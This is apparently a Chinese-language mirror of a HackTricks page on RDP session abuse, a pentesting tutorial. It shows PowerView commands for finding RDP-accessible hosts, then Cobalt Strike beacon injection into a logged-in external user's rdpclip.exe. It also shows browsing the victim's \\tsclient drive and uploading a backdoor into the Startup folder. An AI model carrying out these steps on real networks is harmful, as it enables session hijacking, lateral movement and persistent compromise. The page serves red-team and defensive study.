mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-27 15:12:11 +00:00
99 lines
5.8 KiB
Markdown
99 lines
5.8 KiB
Markdown
# RDP会话滥用
|
||
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 YouTube 🎥</strong></a></summary>
|
||
|
||
- 你在一家**网络安全公司**工作吗?你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||
|
||
- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||
|
||
- 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
||
|
||
- **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||
|
||
- **通过向[hacktricks仓库](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud仓库](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。
|
||
|
||
</details>
|
||
|
||
## RDP进程注入
|
||
|
||
如果**外部组**对当前域中的任何**计算机**具有**RDP访问权限**,攻击者可以**入侵该计算机并等待用户**。
|
||
|
||
一旦用户通过RDP访问,**攻击者可以转移到该用户的会话**并滥用其在外部域中的权限。
|
||
```powershell
|
||
# Supposing the group "External Users" has RDP access in the current domain
|
||
## lets find where they could access
|
||
## The easiest way would be with bloodhound, but you could also run:
|
||
Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
|
||
#or
|
||
Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName
|
||
|
||
# Then, compromise the listed machines, and wait til someone from the external domain logs in:
|
||
net logons
|
||
Logged on users at \\localhost:
|
||
EXT\super.admin
|
||
|
||
# With cobalt strike you could just inject a beacon inside of the RDP process
|
||
beacon> ps
|
||
PID PPID Name Arch Session User
|
||
--- ---- ---- ---- ------- -----
|
||
...
|
||
4960 1012 rdpclip.exe x64 3 EXT\super.admin
|
||
|
||
beacon> inject 4960 x64 tcp-local
|
||
## From that beacon you can just run powerview modules interacting with the external domain as that user
|
||
```
|
||
查看[此页面](../../network-services-pentesting/pentesting-rdp.md#session-stealing)中的其他使用其他工具窃取会话的方法。
|
||
|
||
## RDPInception
|
||
|
||
如果用户通过RDP访问一台被攻击者等待的机器,攻击者将能够在用户的RDP会话中注入一个信标,如果受害者在通过RDP访问时挂载了他的驱动器,攻击者就可以访问它。
|
||
|
||
在这种情况下,您可以通过在启动文件夹中写入后门来入侵受害者的原始计算机。
|
||
```powershell
|
||
# Wait til someone logs in:
|
||
net logons
|
||
Logged on users at \\localhost:
|
||
EXT\super.admin
|
||
|
||
# With cobalt strike you could just inject a beacon inside of the RDP process
|
||
beacon> ps
|
||
PID PPID Name Arch Session User
|
||
--- ---- ---- ---- ------- -----
|
||
...
|
||
4960 1012 rdpclip.exe x64 3 EXT\super.admin
|
||
|
||
beacon> inject 4960 x64 tcp-local
|
||
|
||
# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.
|
||
## \\tsclient\c is the C: drive on the origin machine of the RDP session
|
||
beacon> ls \\tsclient\c
|
||
|
||
Size Type Last Modified Name
|
||
---- ---- ------------- ----
|
||
dir 02/10/2021 04:11:30 $Recycle.Bin
|
||
dir 02/10/2021 03:23:44 Boot
|
||
dir 02/20/2021 10:15:23 Config.Msi
|
||
dir 10/18/2016 01:59:39 Documents and Settings
|
||
[...]
|
||
|
||
# Upload backdoor to startup folder
|
||
beacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
|
||
beacon> upload C:\Payloads\pivot.exe
|
||
```
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
- 你在一家**网络安全公司**工作吗?你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||
|
||
- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||
|
||
- 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
||
|
||
- **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
|
||
- **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。
|
||
|
||
</details>
|